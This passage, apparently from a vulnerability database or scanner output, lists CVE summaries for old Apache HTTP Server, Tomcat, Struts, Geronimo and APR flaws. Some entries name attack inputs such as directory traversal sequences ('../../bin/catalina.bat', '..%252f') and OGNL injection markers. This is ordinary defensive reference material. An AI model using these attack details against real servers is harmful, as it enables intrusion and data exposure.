| [CVE-2009-3094] The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.
| [CVE-2009-2902] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.
| [CVE-2009-2901] The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.
| [CVE-2009-2823] The Apache HTTP Server in Apple Mac OS X before 10.6.2 enables the HTTP TRACE method, which allows remote attackers to conduct cross-site scripting (XSS) attacks via unspecified web client software.
| [CVE-2009-2699] The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.
| [CVE-2009-2696] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.
| [CVE-2009-2693] Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to create or overwrite arbitrary files via a .. (dot dot) in an entry in a WAR file, as demonstrated by a ../../bin/catalina.bat entry.
| [CVE-2009-2625] XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment (JRE) in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service (infinite loop and application hang) via malformed XML input, as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-2412] Multiple integer overflows in the Apache Portable Runtime (APR) library and the Apache Portable Utility library (aka APR-util) 0.9.x and 1.3.x allow remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger crafted calls to the (1) allocator_alloc or (2) apr_palloc function in memory/unix/apr_pools.c in APR
| [CVE-2009-2299] The Artofdefence Hyperguard Web Application Firewall (WAF) module before 2.5.5-11635, 3.0 before 3.0.3-11636, and 3.1 before 3.1.1-11637, a module for the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via an HTTP request with a large Content-Length value but no POST data.
| [CVE-2009-1956] Off-by-one error in the apr_brigade_vprintf function in Apache APR-util before 1.3.5 on big-endian platforms allows remote attackers to obtain sensitive information or cause a denial of service (application crash) via crafted input.
| [CVE-2009-1955] The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote attackers to cause a denial of service (memory consumption) via a crafted XML document containing a large number of nested entity references, as demonstrated by a PROPFIND request, a similar issue to CVE-2003-1564.
| [CVE-2009-1903] The PDF XSS protection feature in ModSecurity before 2.5.8 allows remote attackers to cause a denial of service (Apache httpd crash) via a request for a PDF file that does not use the GET method.
| [CVE-2009-1891] The mod_deflate module in Apache httpd 2.2.11 and earlier compresses large files until completion even after the associated network connection is closed, which allows remote attackers to cause a denial of service (CPU consumption).
| [CVE-2009-1890] The stream_reqbody_cl function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server before 2.3.3, when a reverse proxy is configured, does not properly handle an amount of streamed data that exceeds the Content-Length value, which allows remote attackers to cause a denial of service (CPU consumption) via crafted requests.
| [CVE-2009-1885] Stack consumption vulnerability in validators/DTD/DTDScanner.cpp in Apache Xerces C++ 2.7.0 and 2.8.0 allows context-dependent attackers to cause a denial of service (application crash) via vectors involving nested parentheses and invalid byte values in "simply nested DTD structures," as demonstrated by the Codenomicon XML fuzzing framework.
| [CVE-2009-1462] The Security Manager in razorCMS before 0.4 does not verify the permissions of every file owned by the apache user account, which is inconsistent with the documentation and allows local users to have an unspecified impact.
| [CVE-2009-1275] Apache Tiles 2.1 before 2.1.2, as used in Apache Struts and other products, evaluates Expression Language (EL) expressions twice in certain circumstances, which allows remote attackers to conduct cross-site scripting (XSS) attacks or obtain sensitive information via unspecified vectors, related to the (1) tiles:putAttribute and (2) tiles:insertTemplate JSP tags.
| [CVE-2009-1195] The Apache HTTP Server 2.2.11 and earlier 2.2 versions does not properly handle Options=IncludesNOEXEC in the AllowOverride directive, which allows local users to gain privileges by configuring (1) Options Includes, (2) Options +Includes, or (3) Options +IncludesNOEXEC in a .htaccess file, and then inserting an exec element in a .shtml file.
| [CVE-2009-1191] mod_proxy_ajp.c in the mod_proxy_ajp module in the Apache HTTP Server 2.2.11 allows remote attackers to obtain sensitive response data, intended for a client that sent an earlier POST request with no request body, via an HTTP request.
| [CVE-2009-1012] Unspecified vulnerability in the plug-ins for Apache and IIS web servers in Oracle BEA WebLogic Server 7.0 Gold through SP7, 8.1 Gold through SP6, 9.0, 9.1, 9.2 Gold through MP3, 10.0 Gold through MP1, and 10.3 allows remote attackers to affect confidentiality, integrity, and availability. NOTE: the previous information was obtained from the April 2009 CPU. Oracle has not commented on claims from a reliable researcher that this is an integer overflow in an unspecified plug-in that parses HTTP requests, which leads to a heap-based buffer overflow.
| [CVE-2009-0918] Multiple unspecified vulnerabilities in DFLabs PTK 1.0.0 through 1.0.4 allow remote attackers to execute arbitrary commands in processes launched by PTK's Apache HTTP Server via (1) "external tools" or (2) a crafted forensic image.
| [CVE-2009-0796] Cross-site scripting (XSS) vulnerability in Status.pm in Apache::Status and Apache2::Status in mod_perl1 and mod_perl2 for the Apache HTTP Server, when /perl-status is accessible, allows remote attackers to inject arbitrary web script or HTML via the URI.
| [CVE-2009-0783] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application.
| [CVE-2009-0781] Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML."
| [CVE-2009-0754] PHP 4.4.4, 5.1.6, and other versions, when running on Apache, allows local users to modify behavior of other sites hosted on the same web server by modifying the mbstring.func_overload setting within .htaccess, which causes this setting to be applied to other virtual hosts on the same server.
| [CVE-2009-0580] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when FORM authentication is used, allows remote attackers to enumerate valid usernames via requests to /j_security_check with malformed URL encoding of passwords, related to improper error checking in the (1) MemoryRealm, (2) DataSourceRealm, and (3) JDBCRealm authentication realms, as demonstrated by a % (percent) value for the j_password parameter.
| [CVE-2009-0486] Bugzilla 3.2.1, 3.0.7, and 3.3.2, when running under mod_perl, calls the srand function at startup time, which causes Apache children to have the same seed and produce insufficiently random numbers for random tokens, which allows remote attackers to bypass cross-site request forgery (CSRF) protection mechanisms and conduct unauthorized activities as other users.
| [CVE-2009-0039] Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.
| [CVE-2009-0038] Multiple cross-site scripting (XSS) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) ip, (3) username, or (4) description parameter to console/portal/Server/Monitoring
| [CVE-2009-0033] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, and 6.0.0 through 6.0.18, when the Java AJP connector and mod_jk load balancing are used, allows remote attackers to cause a denial of service (application outage) via a crafted request with invalid headers, related to temporary blocking of connectors that have encountered errors, as demonstrated by an error involving a malformed HTTP Host header.
| [CVE-2009-0026] Multiple cross-site scripting (XSS) vulnerabilities in Apache Jackrabbit before 1.5.2 allow remote attackers to inject arbitrary web script or HTML via the q parameter to (1) search.jsp or (2) swr.jsp.
| [CVE-2009-0023] The apr_strmatch_precompile function in strmatch/apr_strmatch.c in Apache APR-util before 1.3.5 allows remote attackers to cause a denial of service (daemon crash) via crafted input involving (1) a .htaccess file used with the Apache HTTP Server, (2) the SVNMasterURI directive in the mod_dav_svn module in the Apache HTTP Server, (3) the mod_apreq2 module for the Apache HTTP Server, or (4) an application that uses the libapreq2 library, which triggers a heap-based buffer underflow.
| [CVE-2008-6879] Cross-site scripting (XSS) vulnerability in Apache Roller 2.3, 3.0, 3.1, and 4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter in a search action.
| [CVE-2008-6755] ZoneMinder 1.23.3 on Fedora 10 sets the ownership of /etc/zm.conf to the apache user account, and sets the permissions to 0600, which makes it easier for remote attackers to modify this file by accessing it through a (1) PHP or (2) CGI script.
| [CVE-2008-6722] Novell Access Manager 3 SP4 does not properly expire X.509 certificate sessions, which allows physically proximate attackers to obtain a logged-in session by using a victim's web-browser process that continues to send the original and valid SSL sessionID, related to inability of Apache Tomcat to clear entries from its SSL cache.
| [CVE-2008-6682] Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 2.0.x before 2.0.11.1 and 2.1.x before 2.1.1 allow remote attackers to inject arbitrary web script or HTML via vectors associated with improper handling of (1) " (double quote) characters in the href attribute of an s:a tag and (2) parameters in the action attribute of an s:url tag.
| [CVE-2008-6505] Multiple directory traversal vulnerabilities in Apache Struts 2.0.x before 2.0.12 and 2.1.x before 2.1.3 allow remote attackers to read arbitrary files via a ..%252f (encoded dot dot slash) in a URI with a /struts/ path, related to (1) FilterDispatcher in 2.0.x and (2) DefaultStaticContentLoader in 2.1.x.
| [CVE-2008-6504] ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character.
| [CVE-2008-5696] Novell NetWare 6.5 before Support Pack 8, when an OES2 Linux server is installed into the NDS tree, does not require a password for the ApacheAdmin console, which allows remote attackers to reconfigure the Apache HTTP Server via console operations.
| [CVE-2008-5676] Multiple unspecified vulnerabilities in the ModSecurity (aka mod_security) module 2.5.0 through 2.5.5 for the Apache HTTP Server, when SecCacheTransformations is enabled, allow remote attackers to cause a denial of service (daemon crash) or bypass the product's functionality via unknown vectors related to "transformation caching."
| [CVE-2008-5519] The JK Connector (aka mod_jk) 1.2.0 through 1.2.26 in Apache Tomcat allows remote attackers to obtain sensitive information via an arbitrary request from an HTTP client, in opportunistic circumstances involving (1) a request from a different client that included a Content-Length header but no POST data or (2) a rapid series of requests, related to noncompliance with the AJP protocol's requirements for requests containing Content-Length headers.
| [CVE-2008-5518] Multiple directory traversal vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 on Windows allow remote attackers to upload files to arbitrary directories via directory traversal sequences in the (1) group, (2) artifact, (3) version, or (4) fileType parameter to console/portal//Services/Repository (aka the Services/Repository portlet)
| [CVE-2008-5515] Apache Tomcat 4.1.0 through 4.1.39, 5.5.0 through 5.5.27, 6.0.0 through 6.0.18, and possibly earlier versions normalizes the target pathname before filtering the query string when using the RequestDispatcher method, which allows remote attackers to bypass intended access restrictions and conduct directory traversal attacks via .. (dot dot) sequences and the WEB-INF directory in a Request.
| [CVE-2008-5457] Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
| [CVE-2008-4308] The doRead method in Apache Tomcat 4.1.32 through 4.1.34 and 5.5.10 through 5.5.20 does not return a -1 to indicate when a certain error condition has occurred, which can cause Tomcat to send POST content from one request to a different request.
| [CVE-2008-4008] Unspecified vulnerability in the WebLogic Server Plugins for Apache component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors. NOTE: the previous information was obtained from the October 2008 CPU. Oracle has not commented on reliable researcher claims that this issue is a stack-based buffer overflow in the WebLogic Apache Connector, related to an invalid parameter.
| [CVE-2008-3666] Unspecified vulnerability in Sun Solaris 10 and OpenSolaris before snv_96 allows (1) context-dependent attackers to cause a denial of service (panic) via vectors involving creation of a crafted file and use of the sendfilev system call, as demonstrated by a file served by an Apache 2.2.x web server with EnableSendFile configured
| [CVE-2008-3271] Apache Tomcat 5.5.0 and 4.1.0 through 4.1.31 allows remote attackers to bypass an IP address restriction and obtain sensitive information via a request that is processed concurrently with another request but in a different thread, leading to an instance-variable overwrite associated with a "synchronization problem" and lack of thread safety, and related to RemoteFilterValve, RemoteAddrValve, and RemoteHostValve.
| [CVE-2008-3257] Stack-based buffer overflow in the Apache Connector (mod_wl) in Oracle WebLogic Server (formerly BEA WebLogic Server) 10.3 and earlier allows remote attackers to execute arbitrary code via a long HTTP version string, as demonstrated by a string after "POST /.jsp" in an HTTP request.
| [CVE-2008-2939] Cross-site scripting (XSS) vulnerability in proxy_ftp.c in the mod_proxy_ftp module in Apache 2.0.63 and earlier, and mod_proxy_ftp.c in the mod_proxy_ftp module in Apache 2.2.9 and earlier 2.2 versions, allows remote attackers to inject arbitrary web script or HTML via a wildcard in the last directory component in the pathname in an FTP URI.
| [CVE-2008-2938] Directory traversal vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when allowLinking and UTF-8 are enabled, allows remote attackers to read arbitrary files via encoded directory traversal sequences in the URI, a different vulnerability than CVE-2008-2370. NOTE: versions earlier than 6.0.18 were reported affected, but the vendor advisory lists 6.0.16 as the last affected version.
4993| [CVE-2008-2742] Unrestricted file upload in the mcpuk file editor (atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php) in Achievo 1.2.0 through 1.3.2 allows remote attackers to execute arbitrary code by uploading a file with .php followed by a safe extension, then accessing it via a direct request to the file in the Achievo root directory. NOTE: this is only a vulnerability in environments that support multiple extensions, such as Apache with the mod_mime module enabled.
4994| [CVE-2008-2717] TYPO3 4.0.x before 4.0.9, 4.1.x before 4.1.7, and 4.2.x before 4.2.1, uses an insufficiently restrictive default fileDenyPattern for Apache, which allows remote attackers bypass security restrictions and upload configuration files such as .htaccess, or conduct file upload attacks using multiple extensions.
4995| [CVE-2008-2579] Unspecified vulnerability in the WebLogic Server Plugins for Apache, Sun and IIS web servers component in Oracle BEA Product Suite 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, 7.0 SP7, and 6.1 SP7 has unknown impact and remote attack vectors.
4996| [CVE-2008-2384] SQL injection vulnerability in mod_auth_mysql.c in the mod-auth-mysql (aka libapache2-mod-auth-mysql) module for the Apache HTTP Server 2.x, when configured to use a multibyte character set that allows a \ (backslash) as part of the character encoding, allows remote attackers to execute arbitrary SQL commands via unspecified inputs in a login request.
4997| [CVE-2008-2370] Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16, when a RequestDispatcher is used, performs path normalization before removing the query string from the URI, which allows remote attackers to conduct directory traversal attacks and read arbitrary files via a .. (dot dot) in a request parameter.
4998| [CVE-2008-2364] The ap_proxy_http_process_response function in mod_proxy_http.c in the mod_proxy module in the Apache HTTP Server 2.0.63 and 2.2.8 does not limit the number of forwarded interim responses, which allows remote HTTP servers to cause a denial of service (memory consumption) via a large number of interim responses.
4999| [CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
5000| [CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
5001| [CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
5002| [CVE-2008-1734] Interpretation conflict in PHP Toolkit before 1.0.1 on Gentoo Linux might allow local users to cause a denial of service (PHP outage) and read contents of PHP scripts by creating a file with a one-letter lowercase alphabetic name, which triggers interpretation of a certain unquoted [a-z] argument as a matching shell glob for this name, rather than interpretation as the literal [a-z] regular-expression string, and consequently blocks the launch of the PHP interpreter within the Apache HTTP Server.
5003| [CVE-2008-1678] Memory leak in the zlib_stateful_init function in crypto/comp/c_zlib.c in libssl in OpenSSL 0.9.8f through 0.9.8h allows remote attackers to cause a denial of service (memory consumption) via multiple calls, as demonstrated by initial SSL client handshakes to the Apache HTTP Server mod_ssl that specify a compression algorithm.
5004| [CVE-2008-1232] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1.0 through 4.1.37, 5.5.0 through 5.5.26, and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via a crafted string that is used in the message argument to the HttpServletResponse.sendError method.
5005| [CVE-2008-0869] Cross-site scripting (XSS) vulnerability in BEA WebLogic Workshop 8.1 through SP6 and Workshop for WebLogic 9.0 through 10.0 allows remote attackers to inject arbitrary web script or HTML via a "framework defined request parameter" when using WebLogic Workshop or Apache Beehive NetUI framework with page flows.
5006| [CVE-2008-0732] The init script for Apache Geronimo on SUSE Linux follows symlinks when performing a chown operation, which might allow local users to obtain access to unspecified files or directories.
5007| [CVE-2008-0555] The ExpandCert function in Apache-SSL before apache_1.3.41+ssl_1.59 does not properly handle (1) '/' and (2) '=' characters in a Distinguished Name (DN) in a client certificate, which might allow remote attackers to bypass authentication via a crafted DN that triggers overwriting of environment variables.
5008| [CVE-2008-0457] Unrestricted file upload vulnerability in the FileUpload class running on the Symantec LiveState Apache Tomcat server, as used by Symantec Backup Exec System Recovery Manager 7.0 and 7.0.1, allows remote attackers to upload and execute arbitrary JSP files via unknown vectors.
5009| [CVE-2008-0456] CRLF injection vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary HTTP headers and conduct HTTP response splitting attacks by uploading a file with a multi-line name containing HTTP header sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5010| [CVE-2008-0455] Cross-site scripting (XSS) vulnerability in the mod_negotiation module in the Apache HTTP Server 2.2.6 and earlier in the 2.2.x series, 2.0.61 and earlier in the 2.0.x series, and 1.3.39 and earlier in the 1.3.x series allows remote authenticated users to inject arbitrary web script or HTML by uploading a file with a name containing XSS sequences and a file extension, which leads to injection within a (1) "406 Not Acceptable" or (2) "300 Multiple Choices" HTTP response when the extension is omitted in a request for the file.
5011| [CVE-2008-0128] The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.
5012| [CVE-2008-0005] mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.
5013| [CVE-2008-0002] Apache Tomcat 6.0.0 through 6.0.15 processes parameters in the context of the wrong request when an exception occurs during parameter processing, which might allow remote attackers to obtain sensitive information, as demonstrated by disconnecting during this processing in order to trigger the exception.
5014| [CVE-2007-6750] The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.
5015| [CVE-2007-6726] Multiple cross-site scripting (XSS) vulnerabilities in Dojo 0.4.1 and 0.4.2, as used in Apache Struts and other products, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors involving (1) xip_client.html and (2) xip_server.html in src/io/.
5016| [CVE-2007-6514] Apache HTTP Server, when running on Linux with a document root on a Windows share mounted using smbfs, allows remote attackers to obtain unprocessed content such as source files for .php programs via a trailing "\" (backslash), which is not handled by the intended AddType directive.
5017| [CVE-2007-6423] ** DISPUTED ** Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.
5018| [CVE-2007-6422] The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.
5019| [CVE-2007-6421] Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.
5020| [CVE-2007-6420] Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.
5021| [CVE-2007-6388] Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5022| [CVE-2007-6361] Gekko 0.8.2 and earlier stores sensitive information under the web root with possibly insufficient access control, which might allow remote attackers to read certain files under temp/, as demonstrated by a log file that records the titles of blog entries. NOTE: access to temp/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5023| [CVE-2007-6342] SQL injection vulnerability in the David Castro AuthCAS module (AuthCAS.pm) 0.4 for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the SESSION_COOKIE_NAME (session ID) in a cookie.
5024| [CVE-2007-6286] Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.
5025| [CVE-2007-6258] Multiple stack-based buffer overflows in the legacy mod_jk2 2.0.3-DEV and earlier Apache module allow remote attackers to execute arbitrary code via a long (1) Host header, or (2) Hostname within a Host header.
5026| [CVE-2007-6231] Multiple PHP remote file inclusion vulnerabilities in tellmatic 1.0.7 allow remote attackers to execute arbitrary PHP code via a URL in the tm_includepath parameter to (1) Classes.inc.php, (2) statistic.inc.php, (3) status.inc.php, (4) status_top_x.inc.php, or (5) libchart-1.1/libchart.php in include/. NOTE: access to include/ is blocked by .htaccess in most deployments that use Apache HTTP Server.
5027| [CVE-2007-6203] Apache HTTP Server 2.0.x and 2.2.x does not sanitize the HTTP Method specifier header from an HTTP request when it is reflected back in a "413 Request Entity Too Large" error message, which might allow cross-site scripting (XSS) style attacks using web client components that can send arbitrary headers in requests, as demonstrated via an HTTP request containing an invalid Content-length value, a similar issue to CVE-2006-3918.
5028| [CVE-2007-5797] SQLLoginModule in Apache Geronimo 2.0 through 2.1 does not throw an exception for a nonexistent username, which allows remote attackers to bypass authentication via a login attempt with any username not contained in the database.
5029| [CVE-2007-5731] Absolute path traversal vulnerability in Apache Jakarta Slide 2.1 and earlier allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag, a related issue to CVE-2007-5461.
5030| [CVE-2007-5461] Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.
5031| [CVE-2007-5342] The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.
5032| [CVE-2007-5333] Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.
5033| [CVE-2007-5156] Incomplete blacklist vulnerability in editor/filemanager/upload/php/upload.php in FCKeditor, as used in SiteX CMS 0.7.3.beta, La-Nai CMS, Syntax CMS, Cardinal Cms, and probably other products, allows remote attackers to upload and execute arbitrary PHP code via a file whose name contains ".php." and has an unknown extension, which is recognized as a .php file by the Apache HTTP server, a different vulnerability than CVE-2006-0658 and CVE-2006-2529.
5034| [CVE-2007-5085] Unspecified vulnerability in the management EJB (MEJB) in Apache Geronimo before 2.0.2 allows remote attackers to bypass authentication and obtain "access to Geronimo internals" via unspecified vectors.
5035| [CVE-2007-5000] Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5036| [CVE-2007-4724] Cross-site request forgery (CSRF) vulnerability in cal2.jsp in the calendar examples application in Apache Tomcat 4.1.31 allows remote attackers to add events as arbitrary users via the time and description parameters.
5037| [CVE-2007-4723] Directory traversal vulnerability in Ragnarok Online Control Panel 4.3.4a, when the Apache HTTP Server is used, allows remote attackers to bypass authentication via directory traversal sequences in a URI that ends with the name of a publicly available page, as demonstrated by a "/...../" sequence and an account_manage.php/login.php final component for reaching the protected account_manage.php page.
5038| [CVE-2007-4641] Directory traversal vulnerability in index.php in Pakupaku CMS 0.4 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the page parameter, as demonstrated by injecting code into an Apache log file.
5039| [CVE-2007-4556] Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
5040| [CVE-2007-4548] The login method in LoginModule implementations in Apache Geronimo 2.0 does not throw FailedLoginException for failed logins, which allows remote attackers to bypass authentication requirements, deploy arbitrary modules, and gain administrative access by sending a blank username and password with the command line deployer in the deployment module.
5041| [CVE-2007-4465] Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.
5042| [CVE-2007-3847] The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.
5043| [CVE-2007-3571] The Apache Web Server as used in Novell NetWare 6.5 and GroupWise allows remote attackers to obtain sensitive information via a certain directive to Apache that causes the HTTP-Header response to be modified, which may reveal the server's internal IP address.
5044| [CVE-2007-3386] Cross-site scripting (XSS) vulnerability in the Host Manager Servlet for Apache Tomcat 6.0.0 to 6.0.13 and 5.5.0 to 5.5.24 allows remote attackers to inject arbitrary HTML and web script via crafted requests, as demonstrated using the aliases parameter to an html/add action.
5045| [CVE-2007-3385] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.
5046| [CVE-2007-3384] Multiple cross-site scripting (XSS) vulnerabilities in examples/servlet/CookieExample in Apache Tomcat 3.3 through 3.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Value field, related to error messages.
5047| [CVE-2007-3383] Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.
5048| [CVE-2007-3382] Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.
